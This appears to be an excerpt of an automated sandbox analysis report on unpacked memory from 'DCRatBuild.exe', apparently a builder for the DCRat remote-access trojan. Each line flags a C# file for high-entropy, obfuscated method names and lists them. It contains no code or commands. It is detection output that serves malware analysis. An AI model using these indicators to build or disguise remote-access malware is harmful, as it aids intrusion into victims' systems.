            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, CrJ9sxQwgB4PfARRM97.csHigh entropy of concatenated method names: 'P29', '_3xW', 'bOP', 'Th1', '_36d', 've8xKT7Mju', 'LhPxbdQMXx', 'r8j', 'LS1', '_55S'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, xBCaIw1PrVcGNtTJjiy.csHigh entropy of concatenated method names: 'd43', 'YZ8', 'g67', 'G9C', 'zeH0aFGFKpdb6mT6tMs', 'lXRwuWGToHlYR51hFWB', 'DhorAQG7LLgJxHrDNQO', 'YxfuPyGQaLoduGhnQim', 'ey5eGmG3VrbKfc0bqyH', 'sNbodMGhMM9phQAgC81'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, ePmEV1Qai31JfgSSjPc.csHigh entropy of concatenated method names: '_4J6', '_5Di', '_1y5', '_77a', '_1X1', '_7fn', 'OUK', '_8S4', 'wUn', '_447'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, Bb5GXlIDVThxamtP6hu.csHigh entropy of concatenated method names: 'jy1YRgCnfq', 'Y7VN6qBlCwp9jmMo0yr', 'yJC97qBWmpDpofvubDu', 'zNJi6yBKiTtxS2SqbIH', 'OleQGOBUM53ggSKKG3b', 'fvOddNBavF5G5p2gcZW', 'm6bYL5OZ5R', 'fuFYU5Vstn', 'gyEYtaNykF', 'C0rY5IPfS5'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, RKPtI7gYJ7pJMkgXQi.csHigh entropy of concatenated method names: '_59M', 'YZ8', '_1zA', 'G9C', 'c6ZMD4qEdyIpOKiRCHi', 'G4gUamqe21KUB7qcELI', 'IXnwfBqLUmpksZhUhjR', 'SD4Q1LquGZ2XcoYvDe2', 'KKdKiJqSRah6ru3gcIu', 'UDhfVhqXdPIfqM9RIKw'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, xDsoNACsu1IqjwB9wn.csHigh entropy of concatenated method names: 'P37', 'YZ8', 'b2I', 'G9C', 'ly2hSfIpWEjdGu0bNZv', 'DCiWqoIRgykAD3lTeyk', 'ObvCWvI1K64NBN7SrSb', 'DVaksvImNSaOQk2wg30', 'zLRoWvIWE8eWwFUTG40', 'dG7N5RIKohoHoL8yuTB'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, CnaXDB14wxBIrIZiguf.csHigh entropy of concatenated method names: 'kNf', 'YZ8', 'U31', 'G9C', 'DVyBqDxvihxy7xGlKIN', 'XtiO4MxEsmvF8jdB6he', 'vWjpOLxelhS0O3B85OV', 'cWgr4CxLTBilk3QviNl', 'wGpPhKxuQAI31Wuwkj5', 'RS45aDxSf4t9iv8FRxC'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, hankk5m4Rkm1UNGBinc.csHigh entropy of concatenated method names: 'IGD', 'CV5', 'JjnOAF5GHQ', '_3k4', 'elq', 'hlH', 'yc1', 'Y17', '_2QC', 'En1'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, DdoalDfiXXD3LHp9Zhr.csHigh entropy of concatenated method names: '_9YY', '_57I', 'w51', 'hQjMYHDlI8', '_168', 'JDyIOS84pZRU5Hn2fv2', 'vEoAMY8NnesYA6Nknm8', 'dfkXY98FasmyqPu2cyn', 'gfCx0Y8TUIarYgoooH3', 'j6b5OG87uD9NfW8ccOQ'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, hSwbFVnDmHlHbvG6PrZ.csHigh entropy of concatenated method names: 'Be2Rkaxb63', 'WOMRjbOgnZ', 'F8e', 'bLw', 'U96', '_71a', 'O52', 'dbGR3gCCfS', '_5f9', 'A6Y'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, uWuIqeQAZNYWthMp4Xd.csHigh entropy of concatenated method names: '_45b', 'ne2', '_115', '_3vY', 'rQueZI3FST', '_3il', 'hJYe1PvCrj', 'WA6eIaE0u3', '_78N', 'z3K'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, Im7ZDNQn5VoMVrI6R5M.csHigh entropy of concatenated method names: 'r4MuyBDm66', 'yOx3Zx4B8ZONk3bKouc', 'TLsCUO4ZVXCsERrsXgP', 'H44vvV40REBJiKxrgVD', 'CE69ax4OQXGq4ZH44UE', 'NYGsrekW7b', 'q95sJ2kqka', 'iCVsTHZUIG', 'l4Ms0AuSGp', 'T3MsGhLVvI'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, CYToTgQyhRFm7TNLLpg.csHigh entropy of concatenated method names: 'VYtPQ6Nnwm', 'VuIPnqMaVj', 'WguPmoIVYv', 'lm94rXN04Wgi9cmw62k', 'WnTlW9NOOORES4PsqZw', 'PrHJ3pNMOmlS3h8j3Aq', 'cMjII4NjCaOrQqvyP3x', 'bUltg6NBfCylMsYdQi4', 'FreoRvNZVZA1dqmWUw9', 'pm9MUuNyNhuArkrgCBd'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, nuDRoJnot1hl1avl76U.csHigh entropy of concatenated method names: '_14Y', 'b41', 'D7Y', 'xMq', 'i39', '_77u', '_4PG', '_5u8', 'h12', '_2KT'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, XnpTgxmRiFAVyjFFh2q.csHigh entropy of concatenated method names: '_7tu', '_8ge', 'DyU', '_58f', '_254', '_6Q3', '_7f4', 'B3I', '_75k', 'd4G'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, VhMPml118mpaPsrmrrj.csHigh entropy of concatenated method names: 'tO4', 'YZ8', '_4kf', 'G9C', 'JsFHKK9ZIWOBYm5ctw1', 'l0HmIB9ympCEBpIfDHa', 'D1h8qC9PeGdbnoFIkZT', 'nISSkH9D1VOciGUpIbS', 'MFIH3Y9gpIhVVoDuYKh', 'dGX0h498qwOITVsEGZH'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, SA4pyvmHmu95oRQLWuO.csHigh entropy of concatenated method names: 'D4M', '_4DP', 'HU2', '_4Ke', '_5C9', '_7b1', 'lV5', 'H7p', 'V5L', '_736'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, cKxDIp1DR30LvuIFl08.csHigh entropy of concatenated method names: 'BHqIcD56F4', 'nZGI4S4cWf', 'bh1IAWGxW4', 'ut8RuyctD6AVwttrL89', 'SvxSGFcfoSsbWlc6RJp', 'poHgWTc6AgndVNKpY9K', 'ABqB5PccyXsq3MEXrjc', 'AXNidScw24alUX7RUYX', 'vrqyKscYHTWOsfiIRQU', 'bcXuDRcJ1cIm3fqfYm5'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, DDiUNFMO93Kf5vcXdy.csHigh entropy of concatenated method names: '_23T', 'YZ8', 'ELp', 'G9C', 'cbXKbyqsconiveeGDJL', 'wruNafqky1AIk19MTAK', 'tJoVwvq2Z7fOroG1O93', 'AU5uq4qdWWau2u5ugG9', 't2sb8sqzXpVgltbvmVo', 'P70yqfIHuGiHZQgedIt'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, DyanhGfst51QiCfKYHj.csHigh entropy of concatenated method names: 'DQE20dbBxM', 'fjQ2GXwCRI', 'pm12Bf3KVf', 'Y9UTVmPJmLONSuswP4p', 'MIOxQuPwNmrf8iJ4Nto', 'dZiXrHPYlZGKh3oYMHL', 'CbQ4nRPMQ65y4hQZFe8', 'zRu2KdwlI9', 'lqv2bqlCV2', 'AhJ2y3bHGS'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, SigsX8Q91chQ8FtG4Ji.csHigh entropy of concatenated method names: 'xA5KRGNhLy', 'edCKHBS6M3', 'hGtKea94C4', 'WtEKxl37kx', 'cFFKKr1530', 'iG2KbVjTYB', 'MfqKyxehQS', 'W8PKNSIpos', 'wPoKLPOL0W', 'C0IKUKWRY3'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, blBAitfAgFSYhWNYmHM.csHigh entropy of concatenated method names: 'F7p6TF7qxj', 'SiJ60jO67l', 'VQIaZrgBmyf3eRuoI1k', 'pMLI41gZlfD5s0VIZDR', 'IP8Wuvg0GnAbCu3a7u9', 'TmdNv2gOfywmkuyotBa', 'VhTmZOgypf65B27d48A', 'oe3ODJgP7XBVGf2kJ33'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, lXmetBmZ2od6uQ9gUad.csHigh entropy of concatenated method names: 'yHxRq0GjmW', 'p1KRCIwfiv', 'SMPRdcykyq', 'E5nRiYrwGQ', 'HLVRwZw02j', 'hw8Rpdi1cg', '_838', 'vVb', 'g24', '_9oL'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, CL54OdIjQEdrBnVnMYU.csHigh entropy of concatenated method names: 'saOQ85b3vn', 'PMIQDBMSn1', 'F9bQzYre3n', 'YaBnZentHB', 'D1pn12gGsD', 'k9XnIDrHqW', 'gubnfoyO4K', 'HlhnQYd45s', 'NRXnneGvNN', 'NqGVamj5KWe36qHogRj'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, HRH21JQ6vUHB00EaoFM.csHigh entropy of concatenated method names: 'uxk', 'q7W', '_327', '_958', '_4Oz', 'r6z', 'r7o', 'Z83', 'L5N', 'VTw'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, ig8uZN1RMFOwLpVfVAB.csHigh entropy of concatenated method names: 'p23', 'YZ8', 'Gog', 'G9C', 'qMY02RxmJ8OL04MFIrO', 'IJwSBoxWOXIaG3DYt1g', 'tLqKPyxKiEDfJVDSg2q', 'RKQ9gsxlXyMg5EKZhqv', 'BhGnXdxUNVh4R6Y09AH', 'fRZgaYxaQM25BJYegvx'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, EXZU6Gf9nBtdEdOZAkc.csHigh entropy of concatenated method names: 'DC1TKSnewQCAFAEka0F', 'Q9F2w0nLFNwOraRsX38', 'lm7twAnvwHmBAiLroaq', 'dutuT5nEvjJPvEO6XMX', 'IWF', 'j72', 'yM9sy7xlDZ', 'UCqsNFTufh', 'j4z', 'yP3sLTC0WU'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, pOpLyPfFxqHRudwlI9P.csHigh entropy of concatenated method names: '_269', '_5E7', 'egmMpWE2nF', 'Mz8', 'QctMtV4Sh4', 'ms0nq48UEM3Zn2oyFZt', 'RHDUpI8aEeNWkfBEYej', 'hgx2jJ8rnk0PuTG9ihO', 'adrYji85ALRuPiXe0YW', 'mX2y1f8sXQvPsMUQeBL'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, dFjqxW1SiRkKv1aHIWU.csHigh entropy of concatenated method names: 'uUfI1xTCku', 'ly8IIt3WU5', 'qihIfULWf4', 'ovm1Xo6UUvTJqHIDfw8', 'oCeayi6aw7pxgenxSAw', 'etsFF76KnLM89hHha3b', 'rP4PYD6l1FB8P0H5enG', 'CYpuHm6rhG6pAB9dASZ', 'Fvmged65M8Tg4NDO6Nm', 'HaZ8dC6sZElJJtuGVnQ'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, ToD7ohIZAXIUo6hgCXv.csHigh entropy of concatenated method names: 'ePFIRruqKv', 'PaxIOQiKjc', 'OvSIHKO7wq', 'bKoqDecCQqLldv3DM3C', 'B8waWmcbCdXumD6BHjl', 'Vq1cWkcvpZwusjTfjs3', 'mwlO79cEfhnYtU0Y97P', 'hLu83JcejPSydaiAkxU', 'gcRYiMcLQlmB7wcPp1A', 'uwKkRjc3dUVmWZ2GZwL'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, BbYTgtQLihEIjiYLvDZ.csHigh entropy of concatenated method names: '_7zt', 'KpTPUlc4jF', 'jhVPt6f2Li', 'Fp2P57wZcV', 'UUQPV7FVac', 'TM5PcVjnWi', 'RupP4s96Cx', 'y9vBOGNgFnQyOfVEHkr', 'byOq6kN8CXPMDMlkWAo', 'eTcSeUNPG1XIDMFedQX'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, j9LrO9fbJnnDePiDox5.csHigh entropy of concatenated method names: 'KVD2i9Fb4X', 'y192wLvR6t', 'STn2pPmEV1', 'NDuBlBP12rA5tjQieZX', 'S07fSbPmbP70LqmNAtx', 'Bj7DwXPWZcEFdq6mPTB', 'PR8Ij9PKNtcKSlovNeq', 'QUZ7duPlHWOqhLsOGDm', 'yVoKqaPU4JyWPshEKE4', 'aL6LQ3Pa2Uwhx08iedT'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, yBRtMgf1hAkErtdsSdS.csHigh entropy of concatenated method names: 'KBqY3YAcqo', 'kwoYrepGrJ', 'hfJYJNF6kn', 'nH1YT3m2kj', 'DhIoQqBzqpOqfIBHRwa', 'CQGWypB2WxdXQGRHnLo', 'nIcNDGBdg3O9BgusJQx', 'T2GfkwZHb8s3oDO16v7', 'GHdrqPZARP03eqIjUCr', 'smKUIdZVuj6jMtUHBEG'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, uxL8lxfUvgFnXycRaue.csHigh entropy of concatenated method names: 'xex6K3wQQb', 'xMe6bX75SO', 'etb6y20EgO', 'g8nki9DpZ6byqCVKEeG', 'E2uM9uDXOwxiJypj9Qk', 'HnNicpDodfOlyEUwnn1', 'OcdF72DRTKu55FZXJIB', 'OrY6mToTgh', 'yFm6Y7TNLL', 'Sgx62Gd9Qk'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, BHmp2TkGJbLvp37Hiy.csHigh entropy of concatenated method names: 'T43', 'YZ8', '_56i', 'G9C', 'dbicqoVtUP3ZR6gCJEI', 'AIboB4VchFh6wAFmkML', 'DKgYrUVwG8JZcXtJPcv', 'mmmQptVYDwbjK92kquE', 'MbnR2BVJ7Si4YuHG6sr', 'C0IAUmVM3NjuRDti870'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, mkaNOOiu1fppM1vEm4.csHigh entropy of concatenated method names: 'kcq', 'YZ8', '_4bQ', 'G9C', 'bidWPMi9hXRfwjqNkCq', 'TXgkN6iGyDJRRpiNVn5', 'oV2lDEix48WWBv9fcRJ', 'UYrfcZifyw8SDtbcMRW', 'urvSTri6ZY3GR2oUK32', 'K7sRioitZQXbg1K46Ca'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, oHNXMy1NgHLvYQhmElK.csHigh entropy of concatenated method names: 'yiQ', 'YZ8', '_5li', 'G9C', 'dNs5F6xHKHCtiaLhLfn', 'pAwCdQxAugGUfZd5YQ5', 'qsnI8pxVjymRDlAiZmv', 'VrKHBcxqHqZYSjbeIVe', 'bS3itpxID1gdqQUatLj', 'kexs3oxioG7rAfjLqsu'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, vdX4HB0KTgOBXGur3Q.csHigh entropy of concatenated method names: 'g25', 'YZ8', '_23T', 'G9C', 'TTjEbltxJ', 'Bv4KnnVvvGZkXdyNeBX', 'EhUFkgVEJQEkOL0VLv4', 'KlCdWOVe57mrCqBIikp', 'hAkBJXVLPaFQUvRvSRY', 'lifF9CVuFp2vlI206d8'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, KcJDbFfC3DNhp6PdPG9.csHigh entropy of concatenated method names: 'oYo', '_1Z5', 'BLrMXRm9C0', 'OBZsQGEEX2', 'lndMyH3yZP', 'X2STQL8Y17QLJM1a4c3', 'jBM5Ux8JgHRdO8G1aof', 'DVI0mA8MQCix27Keq5N', 'AoIGcm8jKZKIEigMEys', 'cYg5th80Sm4pkxCUNvu'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, sa2LD81iN9jvbHnyqYo.csHigh entropy of concatenated method names: '_625', 'YZ8', '_9pX', 'G9C', 'xBU2lQtPINJBcunG4YK', 'W6w6NXtDSCZc6NDthDn', 'KX1lIxtg9GueQYbvWh8', 'RDgiogt8HWJbIoxudhk', 'jJPAyBtnFQtCR6geHOG', 'm1LDM7t4pxOuQglIbDa'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, RjYdka8VUfxTCkuPy8.csHigh entropy of concatenated method names: '_52U', 'YZ8', 'M5A', 'G9C', 'emS2v1irlXvaN6fingI', 'WxikmMi5QGkIRYdV72q', 'CHfgksis0bevLEhufKC', 'XB8ecrikZoBEnqXW2uE', 'VJavX7i2kvg3nqtLh5J', 'KXCPcdidu9awhPrh38Y'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, BtY0LefQ0AHEZt0pwhq.csHigh entropy of concatenated method names: 'ybfYhj1fgP', 'tEiYEnfwIJ', 'QmpYlFgfMF', 'vpYYqi6Dil', 'fmQYCwqwHm', 'M4gYdDuaRi', 'QShlwrZ7fXaD3NsyeaY', 'rL6QhZZFLCtEdmiS9Nk', 'l0ThxbZTNR0VtHCIjtl', 'yWiPsgZQi9eQWSr5CDT'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, CpUo31OI4nMA2NX4kN.csHigh entropy of concatenated method names: 'GQcGbZDqf', 'FK9Bc3yZM', 'lH874u8WT', 'rLcQMKAL2bQb8UeFM26', 'eQvjRnAE7QlhCe9fYpU', 'bHMpTPAecAATFnn5G2y', 'iFxZkOAukKpEvsmh2Yx', 'ma7ppTASUFlF8MWhE4i', 'TBvP8qAXCnWIL74ygOt', 'ex4BdrAo3J7uC6mNJyh'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, ysPEmGnfkBKp6Pe80lF.csHigh entropy of concatenated method names: 'GRjF6sCgyZeI7SE6JSA', 'mwh88AC8FsABGpkOZqB', 'nr2PBYCP1aAWfKUBErB', 'Df1ToJCDWV4TOCX1dDe', 't1QtAAbjCQ', 'lQKxbaCNrpAjnir5sra', 'sVAhjXCFFqCe5k7yL1o', 'vILgqcCnYObjZjND2gL', 'uEnPpsC41TFC310SQFv', 'phkmfxCTsEW524Hp645'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, o2KOyQhJIjgo267adR.csHigh entropy of concatenated method names: '_66K', 'YZ8', 'O46', 'G9C', 'lR6fP7ItKXwlGyaZ9lc', 'vggRHXIcAR9qQJV2TfW', 'CX54IdIwlvAF0cUxZu2', 'OsCVTDIYTEgRIKeHZGM', 'jygidmIJ6Q087iGm3ap', 'kIkiZFIMWVDLXg69JwM'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, aC3Ov8QP2CxcBt18iNk.csHigh entropy of concatenated method names: 'kJSuBvVVKu', 'U2bu757y11', 'Y6SugwbFVm', 'zlHuXbvG6P', 'CZGuMXR79P', 'QfMdkZ4d3M58nqPHDJ2', 'kCNW174zPOJMxe0lnOj', 'Gvk7vE4kHdVRbqn0u6m', 'cJsVHk42pI5FCaPou45', 'T2SLm4NHpRIdh4db60O'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, TSCIaOIx0hjXyskiOq5.csHigh entropy of concatenated method names: 'BTdf9wDFtY', 'tAeJwxJq9X9sxWq8KKe', 'pHreMYJIkvgc4HRTieE', 'nNAUGTJAvrlW3m0D0yF', 'Wi2dcRJVBSeLYZrvcYH', 'aTKkkjJig1t7aLxGfnr', 'CRZCp0J9iataktcN8GI', 'wuDpcEJGts35NaGy0Hy', 'P5EClyJxwHfn33aHJgd', 'V7TV2VJf9EFDkahlwn5'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, SNXm4AfNO4hHNLDNgqm.csHigh entropy of concatenated method names: 'Q312oJfgSS', 'BPc2F80yES', 'h1n2WtY4VP', 'gso29kZC3O', 'X822vCxcBt', 'nTqTLTD9umBK5olGtMj', 'gJW8XiDGRjilqvu4Udk', 'vrcYbXDIbNOgvdNblqX', 'A9tUegDiTDlqaxiF56f', 'uewS4hDx4YgWyHIhm4f'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, glEcPYQ8T2A99AIlRUf.csHigh entropy of concatenated method names: 'ICU', 'j9U', 'IBK', '_6qM', 'Amn', 'Mc2', 'og6', 'z6i', '_5G6', 'r11'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, A3uninIyfN0hCy6qBF2.csHigh entropy of concatenated method names: 'baQf8M7axU', 'y3PfD0MIOf', 'nv8epcJZUH2dXIsESty', 'd8APL4JynNn8BqTvEvj', 'nhkS9gJP7R73rSLbuml', 'OTdjaOJDfbwqpwcTnTL', 'F6PJkoJgYijOCsJ5Wod', 'VHyY9lJ8WhvubGGVRdR', 'BeYok5JnT2RVSIG7DiV', 'rI0veKJ4BDfBEF9bLFt'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, aW2pwAnWLDFJi0UpVKV.csHigh entropy of concatenated method names: 'ToTRQhwWHH', 'rwLRnAItTJ', 'K7cRm22Jb4', 'aYHRYTfHSk', 'EsfR2O60eB', 'OAPR6d5CFP', 'uxmRsCZaO9', 'VLURayjhrt', 'NtlRulA98H', 'DcnRPZuDaF'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, dpYdqsmwElxsgcqBAx7.csHigh entropy of concatenated method names: 'c7y3c9lS70', '_1kO', '_9v4', '_294', 'dj734u3MpN', 'euj', 'JnE3Ah6vAO', 'j8o3RyIFjD', 'o87', 'q9Z3OMHgsF'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, jBCUvq1VlYREnO5m9Im.csHigh entropy of concatenated method names: 'gHL', 'YZ8', 'vF9', 'G9C', 'OAQHMdxnTfhS6UKsR6I', 'bSTJxDx4paN9qDsg31b', 'rj6IWYxNxO8k6F7DmMh', 'W410RqxF5lN5AuK5mNE', 'jOGaOHxTiwpIXZ1eQVV', 'nRYwGFx7B4JotmiPujP'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, OvSKO71awqCseY3EYhf.csHigh entropy of concatenated method names: '_6U6', 'YZ8', '_694', 'G9C', 'A1iOTcGZCdWHsqceUYG', 'BXQEQOGy5LnTc4jh4Sc', 'uVguPtGP6kfm3fdu3oo', 'mpCoSPGDd5fdATiqD6d', 'A5jE6CGg671QPYs3SpK', 'Q5c0RkG8WVRNH8d6SO9'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, p3tsfvIMgVWhQdF90Fr.csHigh entropy of concatenated method names: 'sjdm2vo2lM', 'E94m68SqGl', 'kKRgXeO5jRJ2kmmEyZU', 'kJkHNsOs71TQavoRt7v', 'Rk4u43Oan6Mih2wsTMP', 'qPGGryOr7Sk9awptDLT', 'p5GmyXlVTh', 'HqeYrABHW9wr2YlAIEi', 'RSNARBBAhwlGJnIRHid', 'UswXJXOdJjWg4YqbMdw'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, suG3iw1ri6A9xseaA2N.csHigh entropy of concatenated method names: 'Xee1qoy5cR', 'wSLO2a6VEUuqOY4G3qw', 'ichAmb6qX8puZpxfIhg', 'mq0vIO6H15yXhn7e3tK', 'YuLjij6AfEu26DtUsij', 'h8RDkg6IIgTnT0ArO6V', 'oxIPue6ioB4Xv91maHn', 'ASYf4i69N4rvVK7Yyyn', 'anI1dt8oXN', 'XdmLBm6fCimSZoUpbIX'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, UsPvByz6Qq2KO8H1Wy.csHigh entropy of concatenated method names: 'Y29', 'YZ8', 'jn6', 'G9C', 'Vs3IIT9qnJZowE7HO8T', 'BiWmhR9IASeHKPlRkgH', 'UrxNjt9iwmpxU3E0amu', 'k05mbV99Q3kli1KdnVs', 'o8ye1L9Gkb7snPQoCeq', 'RadlNo9xx2nisdDYLeY'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, JL2nwxn683rRYjWH3Ib.csHigh entropy of concatenated method names: 'V1QAtatDVA', 'hk7A5Eh0OC', 'Mt8J1QErDwiG5Du4xVn', 'Kfkkh9E5xsGTKiM4txq', 'IWMB22EshYNdMO4ea9g', 'IBRV1uEkNk5dRKmZffa', 'sVSL9IE2Ehtq4k1I2Cm', 'qK8XXhEdRy8OQGiyDwj', 'u8Ee4sEzaUG3nMOYiXQ', 'NvSoTCeHpORBQlabJ5p'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, JaAlfifpDrx5IUw2U78.csHigh entropy of concatenated method names: '_3VT', 'O5t', '_1W5', 'RMIsakpWGE', 'luVMwGlBUa', 'TDVsuTgsSm', 'rC5MN3AuXb', 'xLUPWs8LacFdxcbF6sO', 'fKZHAH8uJP3WmgKrTfQ', 'hfhyqI8EpagNUInAe5U'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, pqlU0xYC9WBKkseoZ1.csHigh entropy of concatenated method names: 'NU0exC9WB', 'Iy5bJIC8RfsnSkT1gF', 'YRt4qe3k8igRJEpLr6', 'Yrh0hmhcjkyC4hhZkY', 'exhYp9bAGjCKs0cLDC', 'ywo2mEvrqLJq0opI0h', 'DxZIxP4vE', 'q0efMdkkA', 'jbtQuORBn', 'JB8n5OUk9'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, Bgn2UD1g7350nNQAMGI.csHigh entropy of concatenated method names: 'Dub189IZUn', 'PMD3So6en8uENUqnlWi', 'lDmLHA6LoSZ59MrwsQW', 'lwaUQk6v0nqf6LHMWMp', 'JIlfw96EsnZG7SmkW5p', 'iIKWvl6u3PZpGH8JGqh', '_3Xh', 'YZ8', '_123', 'G9C'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, nyPRrcQHsZGD5KYLPEA.csHigh entropy of concatenated method names: 'u6ne060nJ4', 'yMZeGKCCcn', 'AXmeBiHbIi', 'JbEe7yuWQo', 'x4VegvBGtt', 'ekS4JUFZYmaNUtnl19d', 'UZvAgxFOdUB1n87WQ65', 'vwcwG8FBY25HvdEFm75', 'u5ISWmFyTKU5DopN2pY', 'uGMvnTFPga48wsFaYD2'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, raqxiEBM8xrpHatTvQ.csHigh entropy of concatenated method names: '_3OK', 'YZ8', '_321', 'G9C', 'x2g5ZwV2EfmVK0cjEwg', 'M3xGf6VdEp65QIVDVE3', 'lovNksVzAXmEZQ1XlCX', 'tbP0xRqHQ7qQ6YtL8Ze', 'IfW0NrqAk8TB3xHH9in', 'KuRIDZqVibpr5PMl8op'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, zb2UlpFHkSTklRr5oa.csHigh entropy of concatenated method names: 'pHw', 'YZ8', 'v2R', 'G9C', 'imO1EIiTY9VlnKhhhpq', 'QnRjL7i7JZXsMHwJAiS', 'hSpGGhiQMS1o5JQ3bjG', 'X9icePi3q4JqSgxvJXl', 'B25tGZihiQiWliEVKCh', 'cwQjSwiCPEp0fYkyCXp'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, FCkR8EQFLB9yQhURlYe.csHigh entropy of concatenated method names: 'uSyx8VHl4g', 'xxpxGaZNR7', 'fC2xBrQJn8', 'wvNx7Qv40l', 'TM9xgWepfv', 'txPxX4VSZe', 'R3vxM2nVsA', 'XkMxSV8HNU', 'XNhxhK0Wyx', 'IckxE7C8TG'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, b0aIlr1lNKlfGdpiHL4.csHigh entropy of concatenated method names: '_2WU', 'YZ8', '_743', 'G9C', 'fQZRXst9mb8Cgr4sAHM', 'LZ39ZVtGyrpkp2QV2U9', 'O6sdk7txedbASwhMbAK', 'P7hqxOtfx8YH1HKJiaF', 'ynHXpMtIEhrBaNNNIi2', 'Dnv4y8tigWoUkiTNj9D'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, QwDFtY1pFu4gKbdC1aQ.csHigh entropy of concatenated method names: '_7v4', 'YZ8', '_888', 'G9C', 'OkigDFthGPcCPOkcRIc', 'HWgCvVtCwu2VRbBKxAW', 'So9yDmtbZEXua3SvkOF', 'hsccGPtvlMTqdMFfxd2', 'IgaJ5ttEd9mvVxyoEPZ', 'HeDok7te5Lh5nQH2KrN'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, pgesf3fxl3jKT3XiUYg.csHigh entropy of concatenated method names: 'ksP2ELKdSt', 'r9y2l8b5ir', 'QPl2qsiWHl', 'HRH2C21JvU', 'brarpCPbG9xKcLP4XcL', 'U38adLPvIVwoAthQhcX', 'TfscWNPEGkRwwm7sj9c', 'AiopfiPhYGmNN4Ewsca', 'Mtoda0PCVNgsd3vhM19', 'mLIRRZPeKpjAMsEyMDy'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, ES9VhuIIPWkEdSlAEcd.csHigh entropy of concatenated method names: 'cdXId6KXri', 'C09IimXDNc', 'mSsIwI8Dln', 'hQTIp0Jjim', 'I0xIoJKZrH', 'GAjIFrMLKt', 'p9DZTSwOerxcHm72ckb', 'eEWCBdwBk4Co9ksJBx2', 'r1I5qrwjAs8QqM0TfZS', 'qdPMdgw0aI4xx9n4vOw'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, F4Aopy1FyJuFAfQL2hY.csHigh entropy of concatenated method names: '_589', 'YZ8', '_491', 'G9C', 'lA9cQltKMjDx8J9rFH9', 'w9gk8ctl1QmZGEb2hFE', 'nupsT8tUXSB3CVenfQn', 'OvWVVLta8MiVnJLLbj6', 'v88l4htroEdHxbSLrS4', 'E1ECdEt5JcBqZxcQwJF'
